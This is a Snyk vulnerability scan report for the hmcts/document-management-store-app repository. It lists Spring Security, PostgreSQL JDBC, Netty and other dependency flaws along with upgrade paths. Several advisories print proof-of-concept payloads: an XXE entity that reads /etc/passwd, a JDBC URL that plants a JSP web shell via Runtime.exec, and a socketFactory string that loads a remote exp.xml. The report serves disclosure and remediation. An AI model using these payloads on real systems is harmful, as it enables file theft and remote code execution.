Vulnerabilities

57 via 166 paths

Dependencies

276

Source

GitHub

Commit

da54edd0

Find, fix and prevent vulnerabilities in your code.

Issue type
  • 57
  • 5
Severity
  • 4
  • 25
  • 30
  • 3
Status
  • 62
  • 0
  • 0

critical severity

Missing Authentication for Critical Function

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.0.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Missing Authentication for Critical Function due to improperly locating method security annotations on private methods. An attacker could invoke the target method without proper authorization by exploiting this vulnerability.

Note:

This is only exploitable if your application is using @EnableMethodSecurity(mode=ASPECTJ) and spring-security-aspects and there are Spring Security method annotations on a private method.

Remediation

Upgrade org.springframework.security:spring-security-core to version 6.4.6 or higher.

References

critical severity

Access Control Bypass

  • Vulnerable module: org.springframework.security:spring-security-config
  • Introduced through: org.springframework.security:spring-security-config@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-config@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-config@3.0.0.RELEASE.

Overview

org.springframework.security:spring-security-config is a security configuration package for Spring Framework.

Affected versions of this package are vulnerable to Access Control Bypass. When using ** as a pattern in Spring Security configuration for WebFlux a mismatch in pattern matching is created between Spring Security and Spring WebFlux, resulting in a security bypass.

Note:

The fixed versions require Spring Framework versions:

  1. 6.0.11+

  2. 5.3.29+

  3. 5.2.25+

Note: The Spring security team have published information about an existing PoC, but have not shared the PoC itself publicly, therefore we don't currently have the ability to verify it.

Remediation

Upgrade org.springframework.security:spring-security-config to version 5.6.12, 5.7.10, 5.8.5, 6.0.5, 6.1.2 or higher.

References

critical severity

Missing Authorization

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.security:spring-security-web@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-web@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-web@5.7.13.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Missing Authorization allowing Spring Security authorization rules to be bypassed for static resources.

Note:

Non-Static Resources Are Not Affected by this vulnerability. This is because handlers for these routes use predicates to validate the requests even if all security filters are bypassed.

Spring Security states that for this to impact an application, all of the following conditions must be met:

  1. It must be a WebFlux application.

  2. It must be using Spring's static resources support.

  3. It must have a non-permitAll authorization rule applied to the static resources support.

Remediation

Upgrade org.springframework.security:spring-security-web to version 5.7.13, 5.8.15, 6.2.7, 6.3.4 or higher.

References

critical severity

SQL Injection

  • Vulnerable module: org.postgresql:postgresql
  • Introduced through: org.postgresql:postgresql@versions.postgresql

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.postgresql:postgresql@versions.postgresql
    Remediation: Upgrade to org.postgresql:postgresql@42.2.28.jre7.

Overview

org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.

Affected versions of this package are vulnerable to SQL Injection when using PreferQueryMode=SIMPLE, which is not the default setting. By passing in a numeric value placeholder immediately preceded by a minus and followed by a second placeholder for a string value, on the same line, an attacker can construct a payload that alters the parameterized query into which it is interpolated. This effectively bypasses the protections against SQL Injection that parameterized queries offer.

Remediation

Upgrade org.postgresql:postgresql to version 42.2.28.jre7, 42.3.9, 42.4.4, 42.5.5, 42.6.1, 42.7.2 or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: commons-fileupload:commons-fileupload
  • Introduced through: org.springframework.cloud:spring-cloud-starter-openfeign@4.3.0

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.cloud:spring-cloud-starter-openfeign@4.3.0 org.springframework.cloud:spring-cloud-openfeign-core@4.3.0 io.github.openfeign:feign-form-spring@13.6 commons-fileupload:commons-fileupload@1.5

Overview

commons-fileupload:commons-fileupload is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when processing multipart headers. An attacker can exhaust system resources by sending malicious requests with excessively large individual multipart headers.

Remediation

Upgrade commons-fileupload:commons-fileupload to version 1.6.0 or higher.

References

high severity
new

HTTP Request Smuggling

  • Vulnerable module: io.netty:netty-codec-http
  • Introduced through: com.azure:azure-storage-blob@12.31.2

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.projectreactor.netty:reactor-netty-core@1.2.8 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.projectreactor.netty:reactor-netty-core@1.2.8 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.projectreactor.netty:reactor-netty-core@1.2.8 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to HTTP Request Smuggling via the parsing of chunk extensions in HTTP/1.1 messages with chunked encoding. An attacker can bypass HTTP request boundaries by sending specially crafted HTTP requests that exploit differences in how standalone newline characters are parsed between reverse proxies and the backend, potentially allowing them to smuggle additional requests.

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.125.Final, 4.2.5.Final or higher.

References

high severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: io.netty:netty-codec-http2
  • Introduced through: com.azure:azure-storage-blob@12.31.2

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final

Overview

io.netty:netty-codec-http2 is a HTTP2 sub package for the netty library, an event-driven asynchronous network application framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the improper handling of concurrently active streams per connection. An attacker can cause resource exhaustion and disrupt service availability by rapidly sending crafted frames, such as WINDOW_UPDATE, HEADERS, or PRIORITY, that manipulate the server's stream reset logic, leading to unbounded concurrent stream processing.

Remediation

Upgrade io.netty:netty-codec-http2 to version 4.1.124.Final, 4.2.4.Final or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: net.minidev:json-smart
  • Introduced through: org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.boot:spring-boot-starter-data-rest@4.0.0-M2 org.springframework.boot:spring-boot-data-rest@4.0.0-M2 org.springframework.data:spring-data-rest-webmvc@5.0.0-M5 org.springframework.data:spring-data-rest-core@5.0.0-M5 org.springframework.hateoas:spring-hateoas@3.0.0-M4 com.jayway.jsonpath:json-path@2.9.0 net.minidev:json-smart@2.5.0

Overview

net.minidev:json-smart is a Java JSON parser.

Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can cause a stack exhaustion and subsequent service disruption by providing JSON input with an excessive number of nested {.

Note:

This issue exists because of an incomplete fix for CVE-2023-1370.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade net.minidev:json-smart to version 2.5.2 or higher.

References

high severity

XML External Entity (XXE) Injection

  • Vulnerable module: org.postgresql:postgresql
  • Introduced through: org.postgresql:postgresql@versions.postgresql

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.postgresql:postgresql@versions.postgresql
    Remediation: Upgrade to org.postgresql:postgresql@42.2.13.

Overview

org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.

Affected versions of this package are vulnerable to XML External Entity (XXE) Injection. The PgSQLXML class used for parsing was found to allow external entities and multiple doc types which could allow XXE attacks.

Details

XXE Injection is a type of attack against an application that parses XML input. XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.

Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.

For example, below is a sample XML document, containing an XML element- username.

<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
   <username>John</username>
</xml>

An external XML entity - xxe, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of /etc/passwd and display it to the user rendered by username.

<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
   <username>&xxe;</username>
</xml>

Other XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.

Remediation

Upgrade org.postgresql:postgresql to version 42.2.13 or higher.

References

high severity

Improper Access Control

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@5.7.12.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Improper Access Control when the application uses AuthenticatedVoter directly and a null authentication parameter is passed to it. Exploiting this vulnerability resulting in an erroneous true return value.

Note

Users are not affected if:

  1. The application does not use AuthenticatedVoter#vote directly.

  2. The application does not pass null to AuthenticatedVoter#vote.

Remediation

Upgrade org.springframework.security:spring-security-core to version 5.7.12, 5.8.11, 6.0.10, 6.1.8, 6.2.3 or higher.

References

high severity

Authorization Bypass

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.security:spring-security-web@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-web@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-web@5.4.11.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authorization Bypass via the RegexRequestMatcher class, which can easily be misconfigured to be bypassed on some servlet containers when it is used with . in the regular expression.

Remediation

Upgrade org.springframework.security:spring-security-web to version 5.4.11, 5.5.7, 5.6.4 or higher.

References

high severity

Arbitrary Code Injection

  • Vulnerable module: org.postgresql:postgresql
  • Introduced through: org.postgresql:postgresql@versions.postgresql

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.postgresql:postgresql@versions.postgresql
    Remediation: Upgrade to org.postgresql:postgresql@9.2-1002-jdbc4.

Overview

org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.

Affected versions of this package are vulnerable to Arbitrary Code Injection. DISPUTED

When an arbitrary filename is specified in the loggerFileName connection parameter, a valid JSP file is created and a Remote Code Execution could be performed.

Note: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties.

PoC

jdbc:postgresql://localhost:5432/test?user=test&password=test&loggerLevel=DEBUG&loggerFile=./blah.jsp&<%Runtime.getRuntime().exec(request.getParameter("i"));%>

Remediation

Upgrade org.postgresql:postgresql to version 42.3.3 or higher.

References

high severity

Man-in-the-Middle (MitM)

  • Vulnerable module: org.postgresql:postgresql
  • Introduced through: org.postgresql:postgresql@versions.postgresql

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.postgresql:postgresql@versions.postgresql
    Remediation: Upgrade to org.postgresql:postgresql@42.2.5.

Overview

org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.

Affected versions of this package are vulnerable to Man-in-the-Middle (MitM). It was possible to provide an SSL Factory and not check the host name if a host name verifier was not provided to the driver.

Remediation

Upgrade org.postgresql:postgresql to version 42.2.5 or higher.

References

high severity

Deserialization of Untrusted Data

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.0.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. spring-security-core configures Jackson with the global default typing enabled. Although Jackson blacklisted known deserialization gadgets, it is still possible for a malicious user to execute arbitrary code on the following conditions:

  1. Spring Security’s Jackson support is being leveraged by invoking SecurityJackson2Modules.getModules(ClassLoader) or SecurityJackson2Modules.enableDefaultTyping(ObjectMapper)
  2. Jackson is used to deserialize data that is not trusted. Spring Security does not perform deserialization using Jackson, so this is an explicit choice of the user.
  3. There is an unknown (Jackson is not blacklisting it already) “deserialization gadget” that allows code execution present on the classpath

This is related to SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

  • Apache Blog

The vulnerability, also know as Mad Gadget

Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.

  • Google

Remediation

Upgrade org.springframework.security:spring-security-core to version 4.2.3.RELEASE or higher.

References

high severity

Privilege Escalation

  • Vulnerable module: org.springframework.security:spring-security-oauth2-client
  • Introduced through: org.springframework.security:spring-security-oauth2-client@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-oauth2-client@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-oauth2-client@5.4.11.

Overview

Affected versions of this package are vulnerable to Privilege Escalation due to allowing a malicious user or attacker to modify a request initiated by the Client (via the browser) to the Authorization Server. This scenario can happen if the Authorization Server responds with an OAuth2 Access Token response containing an empty scope list on the subsequent request to the token endpoint when trying to obtain the access token.

This vulnerability exposes applications that meet all of the following requirements:

  1. Act in the role of a Login Client (e.g. http.oauth2Login())

  2. Use one or more authorization rules with authorities mapped from authorized scopes (e.g. anyRequest().hasAuthority("SCOPE_message.write")) in the client application

  3. Register an authorization server that responds with empty scopes list (per (RFC 6749, Section 5.1)[https://www.rfc-editor.org/rfc/rfc6749#section-5.1])

This vulnerability does not expose applications that:

  1. Act in the role of a Resource Server only (e.g. http.oauth2ResourceServer())

  2. Use authorization rules with authorities not mapped from authorized scopes (e.g. anyRequest().hasAuthority("ROLE_USER")) in the client application

Remediation

Upgrade org.springframework.security:spring-security-oauth2-client to version 5.4.11, 5.6.9, 5.7.5 or higher.

References

high severity

Improper Authentication

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.0.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Improper Authentication. The affected versions support plain text passwords using PlaintextPasswordEncoder. If an application using an affected version of Spring Security is leveraging PlaintextPasswordEncoder and a user has a null encoded password, a malicious user (or attacker) can authenticate using a password of null.

Remediation

Upgrade org.springframework.security:spring-security-core to version 4.2.13.RELEASE or higher.

References

high severity

Improper Input Validation

  • Vulnerable module: com.fasterxml.jackson.datatype:jackson-datatype-jsr310
  • Introduced through: com.fasterxml.jackson.datatype:jackson-datatype-jsr310@versions.jackson

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.fasterxml.jackson.datatype:jackson-datatype-jsr310@versions.jackson
    Remediation: Upgrade to com.fasterxml.jackson.datatype:jackson-datatype-jsr310@2.9.8.

Overview

com.fasterxml.jackson.datatype:jackson-datatype-jsr310 is a datatype module to make Jackson recognize Java 8 Date & Time API data types (JSR-310).

Affected versions of this package are vulnerable to Improper Input Validation that can cause a Denial of Service (DoS). It appear to be exploitable via the victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value.

Remediation

Upgrade com.fasterxml.jackson.datatype:jackson-datatype-jsr310 to version 2.9.8 or higher.

References

high severity

Remote Code Execution (RCE)

  • Vulnerable module: org.postgresql:postgresql
  • Introduced through: org.postgresql:postgresql@versions.postgresql

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.postgresql:postgresql@versions.postgresql
    Remediation: Upgrade to org.postgresql:postgresql@9.2-1002-jdbc4.

Overview

org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) when using certain plugin features. pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, and sslpasswordcallback connection properties.

However, the driver did not verify if the class implements the expected interface before instantiating the class.

PoC

DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");

Remediation

Upgrade org.postgresql:postgresql to version 42.2.25, 42.3.2 or higher.

References

high severity

Authentication Bypass

  • Vulnerable module: org.springframework.security:spring-security-config
  • Introduced through: org.springframework.security:spring-security-config@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-config@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-config@3.0.0.RELEASE.

Overview

org.springframework.security:spring-security-config is a security configuration package for Spring Framework.

Affected versions of this package are vulnerable to Authentication Bypass. The strictness of the Spring Security and the Spring Framework request mapping may differ, which could lead to resources not being secured.

Remediation

Upgrade org.springframework.security:spring-security-config to version 4.1.1.RELEASE or higher.

References

high severity

Improper Authorization

  • Vulnerable module: org.springframework.security:spring-security-config
  • Introduced through: org.springframework.security:spring-security-config@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-config@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-config@3.0.0.RELEASE.

Overview

org.springframework.security:spring-security-config is a security configuration package for Spring Framework.

Affected versions of this package are vulnerable to Improper Authorization due to improper validation in the requestMatchers, leading to authorization rule misconfiguration when the application uses requestMatchers(String) and multiple servlets, one of them being Spring MVC’s DispatcherServlet.

Notes:

An application is only vulnerable when all of the following are true:

  1. Spring MVC is on the classpath.

  2. Spring Security is securing more than one servlet in a single application (one of them being Spring MVC’s DispatcherServlet).

  3. The application uses requestMatchers(String) to refer to endpoints that are not Spring MVC endpoints.

Remediation

Upgrade org.springframework.security:spring-security-config to version 5.8.5, 6.0.5, 6.1.2 or higher.

